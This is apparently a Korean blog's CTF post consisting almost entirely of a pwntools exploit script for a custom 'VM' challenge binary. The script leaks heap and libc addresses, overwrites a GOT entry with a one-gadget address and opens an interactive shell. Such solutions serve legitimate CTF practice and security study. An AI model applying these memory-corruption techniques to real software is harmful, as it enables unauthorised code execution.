fix ex
from pwn import * def dump(): return (0<<0x1c)|((3<<0x1a)&0xc000000)|((0xf<<16)&0xf0000) def setreg(ind,val): return (1<<0x1c)|((1<<0x1a)&0xc000000)|((0xf<<16)&0xf0000)|((ind<<0x17)&0x3800000)|val def movreg(src,dest): #sangsu=(0<<0x1a)&0xc0000000 return (1<<0x1c)|((0<<0x1a)&0xc000000)|((0xf<<16)&0xf0000|((dest<<0x17)&0x3800000))|((src<<0x14)&0x700000) def pad(x): return hex(x)[2:].rjust(8,'0') def push(ind,val): return (8<<0x1c)|((2<<0x1a)&0xc000000)|((0xf<<16)&0xf0000)|((ind<<0x17)&0x3800000)|val def push_s(val): return (8<<0x1c)|((3<<0x1a)&0xc000000)|((0xf<<16)&0xf0000)|val def xchg(r1,r2): return (5 << 0x1c)|(0 << 0x1a)|(r1 << 0x17)| (r2 << 0x14)|((0xf<<16)&0xf0000) def pop(ind): return (9<<0x1c)|((2<<0x1a)&0xc000000)|((0xf<<16)&0xf0000)|((ind<<0x17)&0x3800000) def sub(ind): return (7<<0x1c)|((2<<0x1a)&0xc000000)|((0xf<<16)&0xf0000)|((ind<<0x17)&0x3800000) p=process('./VM') print hex(movreg(6,0)) print hex(setreg(7,0x1234)) #p.sendline(pad(setreg(1,0x44d0))) p.sendline(pad(setreg(7,0x4030-0x30+0x80))*0x20) p.sendline(pad(dump())) p.recvuntil('0x4070 ') heapleak=int(p.recv(3)[:2],16)+0x100*int(p.recv(3)[:2],16)+0x10000*int(p.recv(3)[:2],16)+0x1000000*int(p.recv(3)[:2],16) print hex(heapleak) heapbase=heapleak-0x15cd0 log.info('heapbase : '+hex(heapbase)) p.sendline(pad(setreg(7,0x4000+0x470+0x60))) p.sendline(pad(dump())) p.recvuntil('0x44b0 ') libcleak=int(p.recv(3)[:2],16)+0x100*int(p.recv(3)[:2],16)+0x10000*int(p.recv(3)[:2],16)+0x1000000*int(p.recv(3)[:2],16)+0x100000000*int(p.recv(3)[:2],16)+0x10000000000*int(p.recv(3)[:2],16) libc=libcleak-0x3c4be8 reg_base=heapbase+0x11c20 log.info('libc : '+hex(libc)) overwrite_got=0x60c010#int(raw_input('>>'),16)#0x60c0f0#0x60c088#0x00000000060C198 begin=0x00000000060C188#0x7fe47110e000 system=libc+0x45390+0xabd87 # onegadget log.info('system'+hex(system)) off=overwrite_got-reg_base+0x100000000-0x30+2 print 'off'+hex(off) p.sendline(pad(setreg(0,off&0xffff))) p.sendline(pad(setreg(7,0x4000+4))) p.sendline(pad(push_s(off>>16))) p.sendline(pad(setreg(7,0x4000))) p.sendline(pad(xchg(0,7))) #p.sendline(pad(dump())) #p.interactive() pay='' pay+=pad(push_s(system&0xffff)) pay+=pad(pop(2)) pay+=pad(pop(2)) #p.sendline(pad(dump())) #p.interactive() print pad(pop(2)) print hex(0xffff&(system>>16)) pay+=pad(push_s((system>>16)&0xffff)) #p.sendline(pad(pop(2))) pay+=pad(pop(2)) pay+=pad(pop(2)) pay+=pad(push_s(((system>>16)>>16)&0xffff)) pay+=pad(pop(2)) pay+=pad(pop(2)) pay+=pad(push_s((((system>>16)>>16)>>16)&0xffff)) pay+=pad(movreg(7,1)) for i in range(6): pay+=pad(sub(1)) pay+=pad(dump()) raw_input('>') p.sendline(pay) print 'one :'+hex(system) #p.sendline('000f0000') p.interactive()
'CTF' 카테고리의 다른 글
| [sha2017]megan-35 (0) | 2017.08.07 |
|---|---|
| [H3XOR]column test (0) | 2017.08.02 |
| [2017 googlectf] inst_prof (0) | 2017.06.19 |
| [0ctf qual]EasiestPrintf (0) | 2017.05.25 |
| [codegate 17 final]BMP (0) | 2017.05.14 |